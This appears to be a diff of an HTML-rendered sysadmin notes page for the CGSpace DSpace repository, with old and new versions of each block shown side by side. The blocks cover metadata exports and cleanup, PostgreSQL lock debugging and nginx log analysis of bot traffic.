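<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -v -X POST --data &#34;email=tip-submit@cgiar.org&amp;password=fuuuuuuuu&#34; https://dspacetest.cgiar.org/rest/login
</span></span></code></pre></div><ul>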
<li>I added the account to the Alliance Admins account, which should allow him to submit to any Alliance collection
<ul>
<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
@ -371,13 +371,13 @@ ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
<li>Run <code>dspace cleanup -v</code> process on CGSpace to clean up old bitstreams</li>
<li>Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
COPY 80901
localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
COPY 1274
localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
COPY 8091
</code></pre></div><h2 id="2021-09-23">2021-09-23</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 80901
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1274
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 8091
</span></span></code></pre></div><h2 id="2021-09-23">2021-09-23</h2>
<ul>
<li>Peter sent me back the corrections for the affiliations
<ul>
@ -386,24 +386,24 @@ COPY 8091
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> /tmp/affiliations.csv &gt; /tmp/affiliations-delete.csv
$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -r <span style="color:#e6db74">&#39;^.+$&#39;</span> /tmp/affiliations.csv | csvgrep -i -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> &gt; /tmp/affiliations-fix.csv
$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">211</span>
$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -m <span style="color:#ae81ff">211</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> /tmp/affiliations.csv &gt; /tmp/affiliations-delete.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;correct&#39;</span> -r <span style="color:#e6db74">&#39;^.+$&#39;</span> /tmp/affiliations.csv | csvgrep -i -c <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#e6db74">&#39;DELETE&#39;</span> &gt; /tmp/affiliations-fix.csv
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">211</span>
</span></span><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -m <span style="color:#ae81ff">211</span>
</span></span></code></pre></div><ul>
<li>Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-09-23-affiliations.csv | sed 1d &gt; /tmp/affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-09-23-affiliations.csv | sed 1d &gt; /tmp/affiliations.txt
</span></span></code></pre></div><ul>
<li>Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too</li>
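<li>Those would be applied the same way as the affiliations above, for example (a sketch with assumed file names, using the donor field ID 248 from the export):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/donors-fix.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.donor -t &#39;correct&#39; -m 248
</span></span><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/donors-delete.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.donor -m 248
</span></span></code></pre></div><ul>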
<li>Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne</li>
<li>Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
COPY 1139
</code></pre></div><h2 id="2021-09-24">2021-09-24</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1139
</span></span></code></pre></div><h2 id="2021-09-24">2021-09-24</h2>
<ul>
<li>Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
<ul>
@ -435,33 +435,33 @@ COPY 1139
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
UPDATE 2903
localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.coverage.subregion&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
COPY 1200
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
</span></span><span style="display:flex;"><span>UPDATE 2903
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.coverage.subregion&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
</span></span><span style="display:flex;"><span>COPY 1200
</span></span></code></pre></div><ul>
<li>Then I processed the list for matches with my <code>subdivision-lookup.py</code> script, and extracted only the values that matched:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/subregions.csv | csvcut -c <span style="color:#ae81ff">1</span> | sed 1d &gt; /tmp/subregions-matched.txt
$ wc -l /tmp/subregions-matched.txt
81 /tmp/subregions-matched.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/subregions.csv | csvcut -c <span style="color:#ae81ff">1</span> | sed 1d &gt; /tmp/subregions-matched.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/subregions-matched.txt
</span></span><span style="display:flex;"><span>81 /tmp/subregions-matched.txt
</span></span></code></pre></div><ul>
<li>Then I updated the controlled vocabulary in the submission forms</li>
<li>I did the same for <code>dcterms.audience</code>, taking special care with a few all-caps values:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != &#39;NGOS&#39; AND text_value != &#39;CGIAR&#39;;
localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=&#39;NGOs&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;NGOS&#39;;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != &#39;NGOS&#39; AND text_value != &#39;CGIAR&#39;;
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value=&#39;NGOs&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;NGOS&#39;;
</span></span></code></pre></div><ul>
<li>Update submission form comment for DOIs because it was still recommending people use the &ldquo;dx.doi.org&rdquo; format even though I batch updated all DOIs to the &ldquo;doi.org&rdquo; format a few times in the last year
<ul>
<li>Then I updated all existing metadata to the new format again:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE 49
</code></pre></div><h2 id="2021-09-26">2021-09-26</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 49
</span></span></code></pre></div><h2 id="2021-09-26">2021-09-26</h2>
<ul>
<li>Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
<ul>
@ -489,26 +489,26 @@ UPDATE 49
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,collection,dc.title[en_US]&#39;</span> ~/Downloads/10568-106990.csv &gt; /tmp/2021-09-28-alliance-reports.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,collection,dc.title[en_US]&#39;</span> ~/Downloads/10568-106990.csv &gt; /tmp/2021-09-28-alliance-reports.csv
</span></span></code></pre></div><ul>
<li>She sent it back fairly quickly with a new column marked &ldquo;Move&rdquo; so I extracted those items that matched and set them to the new owning collection:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c Move -m <span style="color:#e6db74">&#39;Yes&#39;</span> ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed <span style="color:#e6db74">&#39;s_10568/106990_10568/111506_&#39;</span> &gt; /tmp/alliance-move.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c Move -m <span style="color:#e6db74">&#39;Yes&#39;</span> ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed <span style="color:#e6db74">&#39;s_10568/106990_10568/111506_&#39;</span> &gt; /tmp/alliance-move.csv
</span></span></code></pre></div><ul>
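<li>The resulting CSV can then be applied with DSpace&rsquo;s metadata import tool (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-import -f /tmp/alliance-move.csv
</span></span></code></pre></div><ul>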
<li>Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
<ul>
<li>I looked at the PostgreSQL activity and it seems low:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_stat_activity&#39; | wc -l
59
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_stat_activity&#39; | wc -l
</span></span><span style="display:flex;"><span>59
</span></span></code></pre></div><ul>
<li>Locks look high though:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | sort | uniq -c | wc -l
1154
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | sort | uniq -c | wc -l
</span></span><span style="display:flex;"><span>1154
</span></span></code></pre></div><ul>
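<li>Grouping the locks by mode gives a rough idea of what kind they are (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT mode, count(*) FROM pg_locks GROUP BY mode ORDER BY count DESC;&#39;
</span></span></code></pre></div><ul>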
<li>Indeed it seems something started causing locks to increase yesterday:</li>
</ul>
<p><img src="/cgspace-notes/2021/09/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
@ -520,9 +520,9 @@ UPDATE 49
<li>The number of DSpace sessions is normal, hovering around 1,000&hellip;</li>
<li>Looking closer at the PostgreSQL activity log, I see the locks are all held by the <code>dspaceCli</code> user&hellip; which seems weird:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceCli&#39;;&#34; | wc -l
1096
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceCli&#39;;&#34; | wc -l
</span></span><span style="display:flex;"><span>1096
</span></span></code></pre></div><ul>
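<li>Grouping the connections by application name makes the imbalance obvious (a sketch):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT application_name, count(*) FROM pg_stat_activity GROUP BY application_name ORDER BY count DESC;&#39;
</span></span></code></pre></div><ul>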
<li>Now I&rsquo;m wondering why there are no connections from <code>dspaceApi</code> or <code>dspaceWeb</code>. Could it be that our Tomcat JDBC pooling via JNDI isn&rsquo;t working?
<ul>
<li>I see the same thing on DSpace Test hmmmm</li>
@ -536,14 +536,14 @@ UPDATE 49
<ul>
<li>Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
COPY 149
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
</span></span><span style="display:flex;"><span>COPY 149
</span></span></code></pre></div><ul>

- Then validate and format the matches:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
$ csvcut -c subject,<span style="color:#e6db74">&#39;match type&#39;</span> /tmp/2021-09-29-ilri-subjects.csv | sed -e <span style="color:#e6db74">&#39;s/match type/matched/&#39;</span> -e <span style="color:#e6db74">&#39;s/\(alt\|pref\)Label/yes/&#39;</span> &gt; /tmp/2021-09-29-ilri-subjects2.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
</span></span><span style="display:flex;"><span>$ csvcut -c subject,<span style="color:#e6db74">&#39;match type&#39;</span> /tmp/2021-09-29-ilri-subjects.csv | sed -e <span style="color:#e6db74">&#39;s/match type/matched/&#39;</span> -e <span style="color:#e6db74">&#39;s/\(alt\|pref\)Label/yes/&#39;</span> &gt; /tmp/2021-09-29-ilri-subjects2.csv
</span></span></code></pre></div><ul>

- I talked to Salem about depositing from MEL to CGSpace
  - He mentioned that the one issue is that when you deposit to a workflow you don't get a Handle or any kind of identifier back!

## 2021-10-01

- Export all affiliations on CGSpace and run them against the latest RoR data dump:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
</span></span><span style="display:flex;"><span>ations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>

- So we have 1879/7100 (26.46%) matching already
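
That percentage can be recomputed directly from the two files above; a small sketch with `bc`:

```console
$ matched=$(csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l)
$ total=$(wc -l < /tmp/2021-10-01-affiliations.txt)
$ echo "scale=2; 100 * $matched / $total" | bc
26.46
```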
<h2 id="2021-10-03">2021-10-03</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/*.log* | grep <span style="color:#e6db74">&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/mozilla-4.0-ips.txt
# wc -l /tmp/mozilla-4.0-ips.txt
543 /tmp/mozilla-4.0-ips.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/*.log* | grep <span style="color:#e6db74">&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/mozilla-4.0-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/mozilla-4.0-ips.txt
</span></span><span style="display:flex;"><span>543 /tmp/mozilla-4.0-ips.txt
</span></span></code></pre></div><ul>

- Then I resolved the IPs and extracted the ones belonging to Amazon:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k <span style="color:#e6db74">&#34;</span>$ABUSEIPDB_API_KEY<span style="color:#e6db74">&#34;</span> -o /tmp/mozilla-4.0-ips.csv
$ csvgrep -c asn -m <span style="color:#ae81ff">14618</span> /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k <span style="color:#e6db74">&#34;</span>$ABUSEIPDB_API_KEY<span style="color:#e6db74">&#34;</span> -o /tmp/mozilla-4.0-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -m <span style="color:#ae81ff">14618</span> /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
</span></span></code></pre></div><ul>

- I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon
- Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"> 1592 GET /handle/10947/2526
